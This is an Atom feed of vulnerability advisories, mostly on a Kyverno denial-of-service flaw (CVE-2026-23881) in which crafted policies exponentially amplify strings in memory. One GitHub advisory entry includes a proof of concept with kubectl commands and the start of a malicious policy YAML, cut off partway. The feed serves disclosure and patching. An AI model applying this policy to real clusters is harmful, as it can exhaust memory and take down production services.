<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-05T05:42:00.914830+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bit-kyverno-2026-23881</id>
    <title>BIT-kyverno-2026-23881 — Kyverno Denial of Service via Context Variable Amplification in Policy Engine</title>
    <updated>2026-10-05T05:42:00.982688+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Bitnami: kyverno</p>
<p>Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/bit-kyverno-2026-23881"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cleanstart-2026-ee99058</id>
    <title>CLEANSTART-2026-EE99058 — Security fix for CVE-2026-23881 applied in: kyverno-policy-reporter-kyverno-plugin-fips 1.4.2-r7</title>
    <updated>2026-10-05T05:42:00.982744+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> CleanStart: kyverno-policy-reporter-kyverno-plugin-fips</p>
<p>Security vulnerability affects the kyverno-policy-reporter-kyverno-plugin-fips package. This issue is resolved in later releases. See references for vulnerability details.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cleanstart-2026-ee99058"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-266669</id>
    <title>EUVD-2026-266669</title>
    <updated>2026-10-05T05:42:00.982769+00:00</updated>
    <content>EUVD-2026-266669</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-266669"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-23881</id>
    <title>fkie_cve-2026-23881</title>
    <updated>2026-10-05T05:42:00.982782+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-23881"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-r2rj-wwm5-x6mq</id>
    <title>GHSA-r2rj-wwm5-x6mq — Kyverno Denial of Service via Context Variable Amplification in Policy Engine</title>
    <updated>2026-10-05T05:42:00.982816+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/kyverno/kyverno</p>
<p>## Summary</p>
<p>Unbounded memory consumption in Kyverno's policy engine allows users with policy creation privileges to cause Denial of Serviceby crafting policies that exponentially amplify string data through context variables.</p>
<p>## Details</p>
<p>For example, the `random()` JMESPath function in `pkg/engine/jmespath/functions.go` generates random strings. Combined with the `join()` function, an attacker can create exponential string amplification through context variable chaining:</p>
<p>The PoC attack uses exponential doubling:
- `l0` = `random('[a-zA-Z0-9]{1000}')` → 1KB
- `l1` = `join('', [l0, l0])` → 2KB
- `l2` = `join('', [l1, l1])` → 4KB
- ... continues to `l18` → 256MB</p>
<p>The context evaluation has no cumulative size limit, allowing unbounded memory allocation.</p>
<p>## PoC</p>
<p>Tested on Kyverno v1.16.1 on k8s v1.34.0 (kind).</p>
<p>1. Create namespace:
```bash
kubectl create namespace poc-test
```</p>
<p>2. Observe pod statuses from `kyverno` namespace on another terminal:
```bash
kubectl get pods -n kyverno -w
```</p>
<p>2. Apply malicious policy:
```yaml
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: memory-exhaustion-poc
  namespace: poc-test
spec:
  validationFailureAction: Enforce
  rules:
    - name: exhaust-memory
      match:
        any:
          - resources:
              kinds:
                - ConfigMap
      context:
        - name: l0
          variable:
            jmesPath: random('[a-zA-Z0-9]{1000}')
        - name: l1
          variable:
            jmesPath: join('', [l0, l0])…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-r2rj-wwm5-x6mq"/>
  </entry>
</feed>
